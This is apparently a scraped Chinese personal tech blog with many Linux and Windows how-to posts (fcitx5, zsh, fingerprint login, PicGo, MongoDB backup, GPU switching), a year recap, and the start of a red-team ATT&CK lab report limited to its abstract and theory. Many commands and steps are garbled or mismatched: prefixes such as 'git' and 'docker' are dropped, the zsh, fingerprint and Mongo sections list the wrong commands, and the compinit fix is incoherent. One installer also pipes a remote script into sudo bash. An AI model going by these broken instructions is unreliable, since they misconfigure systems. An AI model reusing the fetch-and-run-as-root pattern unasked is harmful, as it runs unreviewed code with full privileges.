Casear的技术栈

Fcitx5 输入法配置:切换中文输入法

casearx@foxmail.com (Casear) — Tue, 26 May 2026 17:15:47 GMT

Fcitx5 输入法配置:解决装好后无法切换中文输入法的问题

装完 fcitx5 之后,记得要在系统设置里启用它。但这时我们万万没想到——居然切换不了输入法。

问题出在环境变量上。本文记录配置环境变量让 fcitx5 真正生效的完整过程。

1. 设置环境变量

需要让系统识别 fcitx 作为输入法模块,有两种常见做法。

更推荐方法1，WeChat等应用会出现无法切换输入法和输入中午的时候就使用方法1

在kubuntu Fedora Arch 测试均有效果

方式一:写入 `/etc/environment`

/etc/environment 是整个系统的环境变量,在所有进程启动时都会被读取。在文件中加入:

GTK_IM_MODULE=fcitx
QT_IM_MODULE=fcitx
XMODIFIERS=@im=fcitx

方式二:写入 `~/.profile`

~/.profile 是某用户的环境变量,启动过程中桌面会话期间由 DisplayManager 自动执行,从文本控制台登录时则由登录 shell 自动执行。如果这个文件不存在,自己新建一个即可。

export GTK_IM_MODULE=fcitx
export QT_IM_MODULE=fcitx
export XMODIFIERS=@im=fcitx

注意:虽然 fcitx5 是新版本,但环境变量的值仍然写 fcitx,而不是 fcitx5。这是 fcitx5 官方的兼容设计。

还可以写入其它配置文件(如 ~/.xprofile、~/.bash_profile 等),不一一举例了。要注意有些配置文件在某些登录场景下可能不会被加载,所以不一定起作用。

2. 查看环境变量是否生效

在终端运行:

export

如果输出里没有以下变量,说明配置还未生效:

GTK_IM_MODULE=fcitx
QT_IM_MODULE=fcitx
XMODIFIERS=@im=fcitx

这是因为 /etc/environment 和 ~/.profile 都是在登录时由系统加载的,改完之后当前会话并不会立即应用。

3. 注销并重新登录

注销重新登录,系统就会重新加载配置文件。之后再在终端执行 export,就能看到上面那三个变量了——说明配置生效。

此时回到任何文本输入框,就会发现可以正常切换中文输入法了。

如果有需要,可以在 fcitx5 配置里添加对应的输入法引擎(如拼音、五笔等),不过装好后通常已经自动添加了默认输入法。

参考资料

Razer_GRUB_Theme

casearx@foxmail.com (Casear) — Tue, 26 May 2026 17:16:14 GMT

Razer_GRUB_Theme

Razer粉丝专属GRUB主题

开始

clone https://github.com/CasearF/Razer_GRUB_Theme.git
cd Razer_GRUB_Theme
chmod +x install.sh
sudo ./install.sh           # interactive menu

安装程序接受可选命令，因此可以编写脚本：

sudo ./install.sh install   # install + activate the Razer theme
sudo ./install.sh switch    # pick from themes already under /boot/grub/themes
sudo ./install.sh remove    # disable any active theme (files stay)
./install.sh status         # show current theme + installed ones (no root needed)
./install.sh help

Credits

布局改编自ROG_GRUB_Theme,
，重新着色为 Razer 调色板（#44D62C），并带有 Razer 文字商标。

zsh 环境配置

casearx@foxmail.com (Casear) — Sun, 17 May 2026 13:15:25 GMT

服务器 zsh 环境配置记录：Zim + p10k + eza + zoxide

记录从零搭建服务器 zsh 环境的过程，包含踩过的坑。配置已整理成 dotfiles 仓库，新服务器一键部署。

环境：Ubuntu 24.04 / Debian 12，zsh + Zim 框架

最终工具栈：

工具	作用
Zim	zsh 框架，比 oh-my-zsh 轻，启动快
Powerlevel10k	提示符主题
eza	带图标的 ls 替代，支持 git 状态列
zoxide	智能目录跳转，记住历史，`z 关键词` 直达
fzf	模糊查找，`Ctrl+R` 历史搜索、`Ctrl+T` 文件选择
bat	带语法高亮的 cat（Debian/Ubuntu 上命令名为 batcat）

字体

先做这一步，否则 eza 图标会显示成方块。

eza 的图标由本地终端渲染，服务器不需要装字体。SSH 连服务器时，字符渲染在本地做，改的是本地终端的字体配置。

下载 0xProto Nerd Font：nerdfonts.com

装完在终端设置里切换字体。Windows Terminal 注意：每个 profile 可以单独设字体，改的要是你 SSH 用的那个 profile，不是默认 profile。

配置文件

`.zshenv`

比 /etc/zsh/zshrc 更早加载，用来解决 compinit 重复初始化的问题（见下方坑点记录）。

# 基础模块
zmodule environment
zmodule input
zmodule termtitle
zmodule utility

# Git
zmodule git
zmodule wfxr/forgit          # fzf 加持的 git 交互工具

# 主题
zmodule duration-info
zmodule git-info
zmodule romkatv/powerlevel10k

# 补全（必须在普通模块之后）
zmodule zsh-users/zsh-completions --fpath src
zmodule completion

# 必须最后加载
zmodule zsh-users/zsh-syntax-highlighting
zmodule zsh-users/zsh-history-substring-search
zmodule zsh-users/zsh-autosuggestions

`.zshrc`

# =========================
# ZSH CONFIG
# =========================

# p10k instant prompt（必须最顶部）
if [[ -r "${XDG_CACHE_HOME:-$HOME/.cache}/p10k-instant-prompt-${(%):-%n}.zsh" ]]; then
  source "${XDG_CACHE_HOME:-$HOME/.cache}/p10k-instant-prompt-${(%):-%n}.zsh"
fi

# Zim 初始化
ZIM_HOME=${ZDOTDIR:-$HOME}/.zim
source ${ZIM_HOME}/init.zsh

# 基础环境变量
export LANG=en_US.UTF-8
export LC_ALL=en_US.UTF-8
export EDITOR=vim
export VISUAL=vim

# 历史记录
HISTSIZE=50000
SAVEHIST=50000
HISTFILE=~/.zsh_history
setopt APPEND_HISTORY
setopt SHARE_HISTORY          # 跨会话共享
setopt HIST_IGNORE_ALL_DUPS   # 去重
setopt HIST_REDUCE_BLANKS
setopt HIST_IGNORE_SPACE      # 空格开头不入历史（用于敏感命令）

# 补全
setopt AUTO_MENU
setopt COMPLETE_IN_WORD

# 目录
setopt AUTO_CD

# p10k 主题
[[ -f ~/.p10k.zsh ]] && source ~/.p10k.zsh

# ----------------------------
# Aliases
# ----------------------------

# eza
alias ls='eza --icons --group-directories-first'
alias ll='eza -alF --icons --group-directories-first --git --header --time-style=relative'
alias la='eza -A --icons --group-directories-first'
alias l='eza --icons --group-directories-first'
alias lt='eza --tree --icons --level=2'
alias lt3='eza --tree --icons --level=3'

# bat
alias cat='batcat --paging=never'
alias bat='batcat'

# 目录跳转
alias ..='cd ..'
alias ...='cd ../..'

# 危险操作加确认（服务器上手滑代价大）
alias rm='rm -i'
alias cp='cp -i'
alias mv='mv -i'

# grep
alias grep='grep --color=auto'

# Git
alias gs='git status'
alias ga='git add'
alias gc='git commit'
alias gp='git push'
alias gl='git log --oneline --graph --decorate'

# Docker
alias dps='docker ps'
alias dpa='docker ps -a'
alias di='docker images'
alias dlog='docker logs -f'
alias dex='docker exec -it'

# Systemd
alias sctl='systemctl'
alias sstart='systemctl start'
alias sstop='systemctl stop'
alias sstat='systemctl status'
alias srestart='systemctl restart'

# Network
alias ports='ss -tulnp'
alias myip='curl -s --max-time 5 ifconfig.me'

# Process
alias psg='ps aux | grep'

# ----------------------------
# 性能
# ----------------------------
export KEYTIMEOUT=1

# ----------------------------
# 函数
# ----------------------------

# mkdir + cd
mkcd() { mkdir -p "$1" && cd "$1" }

# 通用解压
extract() {
  if [ ! -f "$1" ]; then echo "'$1' is not a valid file"; return 1; fi
  case "$1" in
    *.tar.bz2)  tar xjf "$1" ;;
    *.tar.gz)   tar xzf "$1" ;;
    *.tar.xz)   tar xJf "$1" ;;
    *.tar)      tar xf "$1"  ;;
    *.bz2)      bunzip2 "$1" ;;
    *.gz)       gunzip "$1"  ;;
    *.zip)      unzip "$1"   ;;
    *.7z)       7z x "$1"    ;;
    *.rar)      unrar x "$1" ;;
    *) echo "Unknown format: $1" ;;
  esac
}

# ----------------------------
# 工具初始化（放文件末尾）
# ----------------------------
eval "$(zoxide init zsh)"
source <(fzf --zsh)

踩坑记录

启动时 compinit 重复初始化

表现

warning: completion was already initialized before completion module.
Will call compinit again.

同时 p10k 弹 instant prompt 警告——p10k 只是信使，检测到启动期间有输出就报警，真正的根因是上面那行。

根因

Ubuntu/Debian 的 /etc/zsh/zshrc 在系统层面调了一次 compinit，Zim 的 completion 模块又调一次，重复了。

定位方法：

exit 2>&1 | grep "compinit" | head

输出里能看到 +/etc/zsh/zshrc:111> compinit，确认是系统配置先调的。

解法

创建 ~/.zshenv，写入：

"skip_global_compinit" /etc/zsh/zshrc

有输出即支持。

Windows 编辑配置文件导致 CRLF 污染

表现

/home/csr/.zimrc:4: command not found: ^M
fatal: unable to access 'https://github.com/zimfw/environment?.git/':
  URL rejected: Malformed input to a URL function

^M 是 Windows 的回车符 \r。zmodule environment 变成了 zmodule environment\r，git clone 的 URL 里带了非法字符。

根因

在 Windows 上用编辑器（VS Code 默认）保存文件时，换行符是 CRLF（\r\n），Linux/zsh 需要 LF（\n）。

三层解法

编辑器层：VS Code 右下角点 CRLF 切成 LF 再保存
仓库层：加 .gitattributes，强制所有文件 LF

*           text=auto eol=lf
*.sh        text eol=lf
.zshrc      text eol=lf
.zimrc      text eol=lf
.zshenv     text eol=lf

提交时加一步规范化：

部署层：deploy() 函数里用 sed 在落盘前清洗

's/\r$//' "$src" > "$dst"

最后一道兜底，即使仓库里偶尔带了 \r，落到目标机器也是干净的。

Zim 安装脚本不能用 `| bash` 执行

表现

You must use zsh to run install.zsh
curl: (23) Failure writing output to destination

根因

Zim 的安装脚本是 .zsh 文件，必须用 zsh 执行。| bash 会把脚本内容塞给 bash，bash 检测到不是 zsh 就退出，curl 那端管道断了所以报写入失败。

解法

先下载到临时文件，再明确用 zsh 执行：

rm -f /tmp/zim-install.zsh

一键部署

配置托管在 GitHub：github.com/CasearF/dotfiles

新服务器部署：

clone https://github.com/CasearF/dotfiles.git ~/dotfiles
cd ~/dotfiles && chmod +x install.sh && ./install.sh
exec zsh

install.sh 自动完成：zsh/git/curl/unzip 检测安装 → eza/zoxide/fzf/bat 安装 → Zim 安装 → 旧配置备份（.bak-时间戳）→ 配置部署（自动清 CRLF）→ Zim 模块安装 → 设 zsh 为默认 shell。

验收

exec zsh

ll                    # eza：图标 + 目录排前 + git 列
z some-dir            # zoxide：模糊跳转
Ctrl+R                # fzf：历史模糊搜索
bat ~/.zshrc          # bat：语法高亮

启动无 compinit 警告，五项全绿即完工。

# ThinkPad T490s Linux 指纹模块启用指南（KDE / Kubuntu）

casearx@foxmail.com (Casear) — Tue, 28 Apr 2026 01:35:39 GMT

ThinkPad T490s Linux 指纹模块启用指南（KDE / Kubuntu）

设备：ThinkPad T490s
系统：Kubuntu / Ubuntu KDE / 其他 Linux
桌面环境：KDE Plasma
功能目标：启用指纹登录、sudo 指纹验证、锁屏解锁

一、确认指纹模块是否可用

安装指纹组件：

sudo apt update
sudo apt install -y fprintd libpam-fprintd

录入指纹：

sudo pam-auth-update

在弹出的界面中勾选：

sudo ls /

提示认证时按压指纹即可。

三、启用登录界面指纹

KDE 默认登录管理器为 SDDM。

检查当前登录管理器：

cat /etc/X11/default-display-manager

若输出：

sudo apt install -y kscreenlocker

五、常见问题修复

1. 指纹服务异常

$USER
fprintd-enroll

3. 查看已录入指纹

$USER

六、安全建议

建议保留密码登录作为备用方案：

指纹识别失败时可回退密码
更新系统后可避免 PAM 配置异常
首次启动部分场景仍需密码

七、最终效果

启用后可实现：

系统登录使用指纹
sudo 提权使用指纹
锁屏解锁使用指纹

八、适用机型说明

ThinkPad T490s 大多数指纹模块在 Linux 下兼容良好，尤其 Synaptics 型号支持度较高。

九、一键安装命令

sudo apt update && sudo apt install -y fprintd libpam-fprintd

十、指纹认证的理论知识

1. Linux 指纹认证的工作原理

在 Linux 系统中，指纹识别通常由以下几个组件协同完成：

硬件层

即笔记本内置的指纹传感器，例如：

Synaptics
Goodix
Validity

负责采集指纹图像或生物特征数据。

驱动层

Linux 内核负责识别 USB / SPI 指纹设备，并提供设备访问接口。

用户空间服务层

常见组件：

fprintd
libfprint

作用：

管理指纹设备
录入指纹模板
执行比对验证

认证层（PAM）

Linux 登录认证通常通过 PAM（Pluggable Authentication Modules）实现。

当启用指纹后，PAM 会调用：

pam_fprintd.so

从而在登录、sudo、锁屏时加入指纹验证流程。

2. 指纹录入并不是保存图片

很多人误以为系统保存了一张指纹照片，实际并不是。

系统通常保存的是：

特征点
纹路方向
局部结构信息
加密后的模板数据

这类数据用于匹配，不可直接还原完整指纹图像。

3. 为什么录入时要按压多次

因为系统需要采集多个角度和区域：

手指偏左
偏右
角度倾斜
压力变化
局部遮挡情况

这样能提高后续识别成功率。

4. 指纹认证的优缺点

优点

登录速度快
日常 sudo 更方便
不必频繁输入密码
移动办公体验更好

缺点

湿手、脏手识别率下降
手指出汗会影响成功率
无法远程使用
高安全场景仍需密码

5. 为什么仍然建议保留密码

密码是“知识因子”，指纹是“生物因子”。

两者组合更安全：

指纹用于高频便捷操作
密码用于兜底恢复
加密磁盘仍建议使用密码

6. ThinkPad 指纹模块为何兼容性较好

ThinkPad 商务系列长期面向企业市场，硬件标准化程度高，Linux 社区适配较积极，因此在 Linux 下兼容性通常优于很多消费级机型。

7. 实际使用建议

推荐模式：

开机登录：密码 / 指纹均可
锁屏解锁：优先指纹
sudo 提权：优先指纹
磁盘加密：强密码

这样兼顾效率与安全。

总结

指纹认证本质上是提升“本地使用效率”的认证方式。
它不是密码的替代品，而是密码体系的补充。

vanblog使用picgo图床的完整部署教程

casearx@foxmail.com (Casear) — Tue, 10 Mar 2026 16:13:27 GMT

图床是什么？

图床你可以理解为一个个人云盘，你可以将你的图片、视频等进行上传，在云端保存。同时，图床也会为你生成一个网址，通过这个网址，所有人都可以直接查看你的图片、视频等媒体素材。

vanblog提供的图床配置页面

其实官方vanblog已经说的很明白如何进行配置了，不过这里更详细的做一下教程，目的是为了方便小白快速上手！

进入vanblog后台-站点管理-系统设置-图床设置，将存储策略从本地改成OSS图床（建议各位先到下面扫描一下文章中的图片并存储在本地图床中，然后再把本地图床的图片导出做个备份）。

接下来，开始配置存储策略设置中的内容。
在Vanblog的官方文档中写到要使用picgo-core的配置文件

:::warning{title="注意"}
VanBlog 使用 picgo-core 配置文件，和桌面版的 picgo 的配置文件不通用！
:::

当然，如果你是大佬，可以直接去看vanblog的部署文档，简洁明了。https://vanblog.mereith.com/feature/basic/pic.html

配置腾讯云COS

首先进入腾讯云的对象存储，腾讯云有关对象存储的收费是有三个衡量标准：

空间（相当于买多大的网盘用来存储）
流量（腾讯云会计算你的下行流量，即访问流量用来计费）
请求数（也可以粗略理解为访问量）
不过就算你是重度使用，每年的价格也不会很贵，我的每年在COS上花费差不多就在50元/年左右，所以别慌！

点击创建存储桶

存储桶（Bucket）是对象的载体，可理解为存放对象的“容器”，且该“容器”无容量上限。对象以扁平化结构存放在存储桶中，无文件夹和目录的概念，用户可选择将对象存放到单个或多个存储桶中

按照以下配置来新建存储桶。

说明

所属地域建议选择和你博客服务器在同一个城市的地域。

名称起好就不能改了，也会作为你的访问域名

:::warning{title="注意"}
腾讯云规定
2024年1月1日后创建的存储桶，不支持使用默认域名在浏览器中预览文件，也不支持下载 APK 或 IPA 文件，了解详情。

默认域名存在安全风险，建议您配置自定义域名。详情参见存储桶切换自定义域名。
:::

访问权限如果你有精力和能力配置策略组，可以选择私有读写，这里我们就选择公有读私有写了。

版本控制看你自己需求，我反正存储空间足够就打开了。

一般来说，图片不怎么需要高可用，这里就不打开多AZ特性了

!/041f7ee7d401006606eed38c09e7bb90.image.webp)

版本控制日志存储可以看自己的储存余量和套餐开启

智极压缩可能会增加费用，酌情开启

服务端加密，图片没什么用，就不开了

关注以下几个数据。

接下来设置一个域名。

网址可以选择单独弄一个域名用来做外链，比如我用的就是img.casear.net，当然你也可以选择你的基础域名。

在域名与传输管理中选择绑定证书，把自己的证书上传

接下来去DNSpod把域名解析给做了，注意是CNAME

有关腾讯云COS的设置就完成了

配置Picgo

我这里是在linux上使用npm安装的picgo-core

# 添加 Node.js LTS 源
curl -fsSL https://deb.nodesource.com/setup_lts.x | sudo -E bash -

# 安装 Node.js（包含 npm）
sudo apt install -y nodejs

#全局安装 picgo-core：
sudo npm install -g picgo-core

根据picgo-core文档中的自动生成方法生成配置文件

picgo set uploader 的交互式命令行配置推荐

（AI时代大可以把这张图片投喂给ai分析一下，会比我说的更详细一些）

感谢张鱼哥同学，他写了一份很详细的腾讯云 COS 配置指南：

vanblog 使用 picgo 图床的完整部署教程

本文基于该文章撰写改动而来，目前张鱼哥的博客在2026-3-9无法访问

是通过互联网档案馆的镜像查看的
:::

vanblog备份恢复评论数据

casearx@foxmail.com (Casear) — Sun, 08 Mar 2026 21:50:11 GMT

1. 导出 waline 评论数据库

在宿主机执行：

exec vanblog-mongo-1 mongodump -d waline -o /data/backup

说明：

参数	含义
-d waline	只导出评论数据库
-o /data/backup	导出到容器里的目录

执行后容器内会生成：

cp vanblog-mongo-1:/data/backup ./waline-backup

备份出来的目录结构应该是这样：

cp /home/ubuntu/waline-backup/waline vanblog-mongo-1:/data/waline

如果是在 Docker：

exec -i vanblog-mongo-1 mongorestore -d waline --drop /data/backup/waline

执行恢复

exec -it vanblog-mongo-1 mongorestore -d waline --drop /data/waline

参数说明：

|参数 |作用|

-d waline	恢复到 waline 数据库
--drop 先删除旧	collection 再恢复
/data/waline	备份目录

验证恢复

进入 Mongo：

解决 OpenConnect VPN 由于 JScript 引擎丢失导致的 Error 1 深度修复

最近在个人环境遇到一个非常棘手的问题。在使用 OpenConnect VPN 连接时，明明已经通过了账号密码认证，但最后一步配置路由时总是弹出：Script 'vpnc-script.js' returned error 1。

1. 发现问题

起初我以为是权限问题或脚本路径不对，但在手动定位到目录执行时，发现了惊人的报错：

C:\> cscript //E:JScript "D:\...\vpnc-script.js"

输入错误: 没有文件扩展“.js”的脚本引擎。
这说明系统的 JScript 解析引擎彻底消失了。回想起之前安装并卸载过一个叫“节点小宝”的软件，原因显而易见：这些软件会劫持脚本关联，卸载时却没把原生的还给 Windows。

2. 核心修复步骤

对于我来说，最担心的就是破坏现有的系统环境，因为我电脑上的环境已经复杂到不想重装系统了。实测证明，修复 JScript 关联是非常安全的操作。

恢复注册表关联：创建并运行以下 fix.reg 文件：

Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\.js]
@="JSFile"
"Content Type"="text/jscript"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\JSFile\ScriptEngine]
@="JScript"

3. 总结

这次修复不仅解决了 VPN 无法连接的问题，还意外发现系统中其他依赖 WSH (Windows Script Host) 的脚本工具也都恢复了。

:::warning{title="建议"}
定期清理这类修改系统底层的软件，或者在沙盒中运行它们是很有必要的。
:::

Fuck 2025

casearx@foxmail.com (Casear) — Sun, 04 Jan 2026 14:34:29 GMT

1-5月休息打游戏

一到五月可以说是在自我麻痹，以为在当时还有在做GTA服务器，又在筹备考试，分身乏术
6-7月驾驶证毕业退租

休息完了，也临近毕业季，着手开始科二，回老家一个月终于把驾照拿下来了，然后就是马不停蹄的毕业，但是我当时对毕业没什么感觉，大部分的同学关系都一般，只是和专业课老师吃了顿饭，就当是结束了。退租的事情不是很愉快，最后草草收拾了一下就离开了，大部分电子设备也留在了内蒙
7-8月北京老毛麻痹自己

退租前就有目标去北京找朋友一起，关系很不错，我们说着要打一万场沙二，在北京的那一个月大部分时间都很开心，除了想着找工作的时候
8-9月老家等人乌兰浩特

朋友回了日本，我也先回了老家，一是想开车玩玩，二是等等朋友退伍，这一等就是一个月........，后来一起去了乌兰浩特，这个地方真是诡异，标准的发展停滞姿态，还有精神小伙，遂跑路，当时也没地方去，就近就选择了长春
9-12月长春找工作租房麻木

长春这个地方更是该死，fxxk you 中介，fxxk you 信号塔贷款，and especially fxxk you 盒饭。一个地方怎么可以这么诡异，这里是美食荒漠吗，全是盒饭和麻辣烫。

再说找工作，为了不回老家我已经在电脑城上班了，我初中的时候就在装系统，没想到毕业了还在装系统，年后一定得换个工作了，一度上班到崩溃，已经想要买个二手车到处转了
12 Heartbroken

如何配置一个虚拟显示器，以便远程没有显示器的系统

casearx@foxmail.com (Casear) — Mon, 26 Jan 2026 20:47:55 GMT

原项目：https://github.com/roshkins/IddSampleDriver

编译好的下载：https://github.com/ge9/IddSampleDriver/releases

另一个编译好的下载：https://github.com/itsmikethetech/Virtual-Display-Driver/releases

1、将下载好的压缩包，内容解压放置到 C:\IddSampleDriver 文件夹下，必须是这个目录，因为代码里写死了。

2、先使用管理员身份运行脚本 C:\IddSampleDriver\installCert.bat 添加驱动证书到系统。

3、再打开 C:\IddSampleDriver\option.txt 文件修改其内容。

下方列出了很多分辨率与帧率的模式，请根据需要保留一个或几个

第一行的数字代表默认使用哪一个

比如最终文件内容可以是：

1
1920, 1080, 60
4、在设备管理器中，添加过时硬件，手动选择驱动，选择显示适配器，从磁盘安装，找到 iddsampledriver.inf 选择安装即可。

5、安装完成即可获得一个不能直接看到的显示器，如需删除，手动在设备管理器中删除即可。

解决kde环境下切换登陆屏幕（SDDM）后显示异常

casearx@foxmail.com (Casear) — Thu, 31 Jul 2025 12:07:26 GMT

在安装了登陆屏幕后有时会发现切换后会显示异常，具体情况为：

背景是白色的，而不是通常的壁纸
屏幕下半部分是一个巨大的可视键盘（可以隐藏起来）
屏幕中间显示默认用户图片，其下方是密码文本字段
输入密码并按下回车键不会打开用户会话
用于选择会话的下拉菜单位于左上角
用于选择会话的下拉菜单没有条目
因此无法使用 SDDM 登录 Plasma 桌面环境。
解决方案为查看sddm.conf

sudo vim /etc/sddm.conf

问题可能是只自动设置了 [Users] 的内容，这时需要手动设置主题即可生效

sudo sed -i 's/^Current=.*/Current=breeze/' /etc/sddm.conf
sudo systemctl restart sddm

rss

casearx@foxmail.com (Casear) — Wed, 30 Jul 2025 14:58:33 GMT

This message is used to verify that this feed (feedId:166846222547564544) belongs to me (userId:166843849953549312). Join me in enjoying the next generation information browser https://folo.is.

Kubuntu 上安装显卡驱动和 EnvyControl

casearx@foxmail.com (Casear) — Fri, 04 Jul 2025 13:59:20 GMT

Kubuntu 双显卡配置：EnvyControl + Optimus GPU Switcher

本指南适用于 Kubuntu + KDE Plasma 6 + Wayland 系统，使用 AMD 集显 + NVIDIA 独显（如 RTX 3070 Mobile / Max-Q）的笔记本用户，详细介绍如何配置 EnvyControl 实现显卡切换，并集成 KDE 小组件 Optimus GPU Switcher 实现图形化操作。

系统与硬件信息

系统：Kubuntu 24.x / KDE Plasma 6.3.4 / Wayland
CPU：AMD Ryzen 9 5900HX
GPU：
- 集显：AMD Radeon Vega
- 独显：NVIDIA RTX 3070 Mobile / Max-Q

安装 NVIDIA 驱动（推荐开源版本）

运行命令查看可安装驱动

sudo ubuntu-drivers devices

当前推荐驱动

从输出可以看到：

sudo apt install nvidia-driver-570-open

如果你遇到图形兼容问题或需稳定性高（如 CUDA 深度学习）：

sudo apt install nvidia-driver-570

闭源版本在游戏与 CUDA 开发中的表现通常更稳定。

:::info{title="..."}
我选择了安装开源驱动，暂时先应对桌面环境，我游戏和深度学习方面还有其他主机
:::

sudo apt install nvidia-driver-570-open

若系统开启了 Secure Boot，会提示创建 MOK 密钥。设置密码并在重启时进入蓝色界面选择 Enroll MOK 完成注册。

验证驱动：

sudo apt update
sudo apt install git python3 python3-pip python3-setuptools

2. 克隆并安装

clone https://github.com/bayasdev/envycontrol.git
cd envycontrol
sudo pip3 install .

3. 使用示例

# 查看当前模式（缓存）
envycontrol --cache-query

# 切换到混合模式（推荐）
sudo envycontrol -s hybrid

# 切换到集显
sudo envycontrol -s integrated

# 切换到独显
sudo envycontrol -s dedicated

# 切换后需重启
sudo reboot

安装 Optimus GPU Switcher（KDE 图形小组件）

1. 克隆并安装

clone https://github.com/enielrodriguez/optimus-gpu-switcher.git
cd optimus-gpu-switcher
kpackagetool6 -t Plasma/Applet -i .

Plasma 5 用户使用：

sudo apt install libnotify-bin zenity

小组件功能说明

显示当前显卡模式（如 HYBRID currently in use.）
下拉选择显卡切换（integrated / hybrid / dedicated）
Refresh 按钮手动刷新状态

Linux实用软件分享

casearx@foxmail.com (Casear) — Fri, 04 Jul 2025 14:00:20 GMT

邮箱：Thunderbird

笔记：obsidian

ssh：electerm（暂定，不知性能如何）

kubuntu 搜狗输入法安装问题解决

casearx@foxmail.com (Casear) — Wed, 25 Jun 2025 18:52:56 GMT

安装相关依赖来解决可能无法输入中午的问题

sudo apt-get install libqt5quickwidgets5
sudo apt-get install libQt5Qml.so
sudo apt-get install libgsettings-qt1
sudo apt-get install libgsettings-qt1

安装完成后可能会出现闪屏现象

export QT_QPA_PLATFORM=xcb
pkill fcitx; fcitx;

:::warning{title="注意"}

结果，别用搜狗，搜狗已经很久没更新了，不如直接用fcitx5自己的中文输入法
:::

终端工具的选择

casearx@foxmail.com (Casear) — Thu, 12 Jun 2025 13:06:05 GMT

之前有接触到zsh ，但是发现在MobaXterm上显示的效果不是很好，所以尝试了windterm，刚开始感觉还是不错的，但是后来感觉它的逻辑有点反人类，经常要点很多确认框之类的，最近新到手了个灵刃14，想着再试MobaXterm吧，突然想到显示问题可以通过安装新的字体来解决，在安装了powerlevel10k推荐的字体后，windterm对我来说就没有那么大的吸引力了，还是MobaXterm用着更顺手一些

ATT&CK红队评估实战靶场二

casearx@foxmail.com (Casear) — Mon, 24 Nov 2025 04:09:19 GMT

摘要

在数字化转型背景下，企业内网安全面临横向渗透等复杂威胁。传统防御体系难以应对攻击者在入侵后横向移动的行为，APT攻击、内部威胁及权限滥用进一步加剧风险。本研究聚焦基于MITRE ATT&CK 框架的企业内网横向渗透防御与实战验证，提出通过红队靶场演练模拟真实攻击场景，系统分析攻击路径、技术细节及防御对策。研究内容涵盖横向渗透概念、ATT&CK框架解析、技术手段如密码攻击、漏洞利用、ARP欺骗、RDP攻击等，并评估企业现有安全措施的局限性。随后，通过构建虚拟化红队靶场开展实战演练，从信息收集、目录与中间件探测，到漏洞利用、权限提升，再到内网信息获取与横向移动，完整复现攻击链条，利用Mimikatz、WeblogicScanner等工具成功实施攻击并获取管理员权限。研究强调靶场设计需具备仿真性与可扩展性，结合自动化与威胁情报，最终为企业制定更有效的内网防护策略、提升响应能力提供数据支持与实践指导。

关键字企业内网横向渗透 ATT&CK框架红队靶场安全防护

引言

随着信息技术的迅猛发展和企业数字化转型的持续推进，网络安全问题日益凸显，尤其是企业内网中的横向渗透攻击，已成为当前网络安全防御体系中最具挑战性的威胁之一。横向渗透是指攻击者在成功入侵某一系统节点后，利用已获取的权限、漏洞或凭据，在内网中横向移动，进一步控制其他主机、窃取敏感数据或破坏关键业务系统。相比传统的边界型攻击，横向渗透更具隐蔽性、持续性和破坏性，给企业带来极大的安全风险与经济损失。

当前多数企业的防护体系仍以边界控制、访问权限划分和病毒查杀为核心，面对高度复杂、多阶段、多技术组合的横向渗透行为，存在响应迟缓、误报率高、防御盲区等问题。为有效提升企业对高级持续性威胁（APT）及内网攻击的检测与防御能力，研究和实践迫切需要一种系统化、可验证的技术手段进行支持。

MITRE提出的ATT&CK框架为攻击建模和行为分析提供了标准化方法，涵盖了攻击者从初始访问到横向移动、权限提升、数据外泄等各阶段的策略与技术，已成为网络攻防领域的重要参考模型。红队靶场作为演练和验证该框架应用的重要平台，能够在可控环境下模拟真实攻击过程，全面测试企业防御体系的有效性与覆盖面。

本研究立足于ATT&CK框架，围绕企业内网横向渗透的攻防演练需求，设计并实现一套红队靶场系统，结合信息收集、漏洞利用、权限提升与防御对策分析等内容，旨在通过实战验证发现问题、优化策略，为企业构建主动防御体系提供理论依据与实践指导，进一步推动网络安全防护从被动防御向主动检测与响应的转变。

第一章企业内网横向渗透综述

1.1 横向渗透的现实威胁

当前的网络攻击活动呈现出链式、多阶段、高隐蔽性的特点，其中“横向渗透”已成为攻防对抗中的核心环节。在边界防御被突破后，攻击者常借助内网中的信任关系、权限继承及资产复杂性，通过凭证窃取、服务滥用、远程执行等手段在网络中横向移动，以达到权限扩展、信息窃取或持久控制的目的。相较于外部入侵，横向渗透更加隐蔽，持续时间更长，破坏性更强，给网络防护体系带来了较大挑战。

1.2 横向渗透的典型技术路径

横向渗透通常包括多个关键技术步骤。首先是信息收集，攻击者会识别网络结构、主机清单、活跃会话及用户权限等关键情报；其次是凭证获取，常用手段包括哈希转发、口令猜解、内存读取等；随后通过权限提升与远程执行，攻击者可进入目标主机并持续拓展控制范围。具体方式包括使用PsExec、WMI、RDP、SMB等协议工具完成横向控制。这一过程往往伴随着日志清除、权限清洗与持久化设置，使检测与响应工作难度增加。

1.3 防御机制与当前挑战

当前主流的横向渗透防御手段包括网络分段、最小权限访问控制、入侵检测系统（IDS）、行为分析系统、终端防护平台（EDR）等。通过隔离不同网络区域、限制账号权限、部署流量监控与行为建模系统，可以有效压缩攻击者活动空间。然而，在实际部署中，防御体系仍面临诸多挑战，如访问控制策略不完善、横向活动日志分散、缺乏跨系统事件关联机制等，导致威胁难以及时发现和响应。

1.4 横向防护的发展趋势

面向未来，横向渗透防护正逐步向智能化、精细化方向发展。以攻击链为核心的防御模型、基于行为的异常识别算法、零信任网络架构与微隔离技术被广泛应用于新一代内网安全体系建设中。同时，终端与网络的深度联动、资产动态建模、风险可视化分析与响应自动化也成为关注重点。通过引入威胁情报融合机制与持续安全评估能力，企业正在构建具备主动防御与快速响应能力的横向防护体系，以应对日益复杂的内网攻击风险。

第二章企业内网横向渗透的理论基础

2.1 横向渗透的基本概念

横向渗透是网络安全领域中的关键概念，指攻击者在成功入侵初始目标后，通过该系统作为跳板，在同一网络中扩展攻击范围并获取更多系统的控制权。这一过程通常发生在企业内网环境中，攻击者利用已获得的权限和信息，逐步访问其他系统或设备。横向渗透的重要性在于其能够突破传统的边界防御体系，使攻击者在网络内部自由移动，进而窃取敏感数据或破坏关键业务系统。在现代企业环境中，随着网络规模的扩大和复杂性的增加，横向渗透攻击的风险也日益突出。攻击者一旦进入内网，便可能绕过外围防火墙等防护措施，对企业核心资产构成直接威胁。

